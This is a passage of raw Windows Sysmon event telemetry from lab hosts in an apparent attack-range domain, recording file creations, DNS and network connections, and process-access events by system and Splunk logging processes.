23542300x8000000000000000149348Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:27.054{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\pending_pings\c23f41f6-f51c-4905-a13a-eeb7a00a5187MD5=7A20D723A91C96CAECACF688E80510A1,SHA256=3BA04B52F23CD81D9CB357E572F6F5CF6567ACD640B24BEAAC688ED34B95E4FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149347Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:27.050{39BD8DE3-2344-60CA-0D03-00000000D101}4992WIN-HOST-14\AdministratorC:\Windows\system32\mmc.exeC:\Users\Administrator\AppData\Local\Microsoft\Event Viewer\Settings.XmlMD5=002C0DFAD9BB6A9A7B45221DBB845642,SHA256=11F56F1461BE809227F31292213525E3BEC72FDD87B672EF13334B27A2244ACA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104511Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:26.648{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal60215- 354300x8000000000000000104510Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:26.645{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal53475- 354300x8000000000000000104509Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:26.642{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal61337- 23542300x8000000000000000104508Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:28.384{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CDCAA43736D81D6CD8698658078A74C,SHA256=A3172DD0961E80F803DFE993808B57898B61E1639D06E658BA7B987ABFB57FCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149360Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:28.501{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8333D8E747C9CC19BF685F6ECF5D545,SHA256=D003210820D3F5FE8B4CD2F9E2CF43C84B515A70D9D1B5E64B291598900F0EBE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149359Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:28.068{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149358Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:28.067{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149357Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:28.063{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149356Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:28.063{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149355Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:28.063{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149354Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:28.063{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104513Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:29.749{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9390157ED60D7E942A1BCF2E1E3EE2ED,SHA256=F24E6477B4C757A8FFB7FEB530A3EDC8C955F7DFD9B3E33B6C4B2A3349DA9E96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104512Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:29.067{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=575881CD74A970AC6618DE6CE7985152,SHA256=F84D3902FF4920F83F964E2EBA876F86CF4D57AE8F7355AC57BFB05D02FCF7DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149365Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:29.815{39BD8DE3-0FD9-60CA-8700-00000000D101}3216WIN-HOST-14\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\WebCache\V010000B.logMD5=8658432CE317A72D698265E6E277F393,SHA256=12BE89779FEACE76ECF49C379A0DC71449EADDF64D3D992A3DA2F3FDE4564A63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149364Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:29.815{39BD8DE3-0FD9-60CA-8700-00000000D101}3216WIN-HOST-14\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\WebCache\V010000A.logMD5=D6C3FB64110B2778E7C149018D1DE9B0,SHA256=3778BA5D934058CF6060F03AA2974743D788D75EB012E5C1CBF6FBC08F3ED1AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149363Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:29.799{39BD8DE3-0FD9-60CA-8700-00000000D101}3216WIN-HOST-14\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\WebCache\V0100009.logMD5=BCFCB53D5C32C19A0D91FEDFD45B11D6,SHA256=70F4AF90841D8AF5C9C82518E90F9DA42669C59F160EF4BA89D5E7B88D2BD7FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149362Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:29.600{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84BEC94760944AA302B50C6B6AB7AE34,SHA256=8373AD062760AF179B1EA7341606FE671C2902C1BA9FAC57A28528F681E88E6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000149361Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.777{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exeWIN-HOST-14\Administratortcptruefalse10.0.1.15win-host-14.attackrange.local58325-false52.88.2.59ec2-52-88-2-59.us-west-2.compute.amazonaws.com443https 354300x8000000000000000104514Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:29.167{54715871-FD28-60C9-2F00-00000000CF01}2148C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-681.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal58311- 354300x8000000000000000149499Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:29.051{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58326-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000149498Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.615{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C6A572A68913B62A8F5E23DF899D2F9,SHA256=39313C6B8B6FC4AD33F3C285521D0B8E8ED681DE9A8203A8B571FCDFFD888CF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149497Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.451{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=138940719379BBDFC8025C4E2ABB62D9,SHA256=D69B75303C69C0B97D08435BD9C1CE620B713B9504E4B803E9356A01FF3E576C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149496Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7078-60CA-040D-00000000D101}7080C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149495Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-7078-60CA-040D-00000000D101}7080C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149494Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149493Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-481E-60CA-2D08-00000000D101}5140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149492Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149491Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149490Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149489Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480E-60CA-FA07-00000000D101}7132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149488Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149487Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149486Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149485Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c144|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149484Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:30.352{39BD8DE3-3FF8-60CA-FA06-00000000D101}54285848C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla 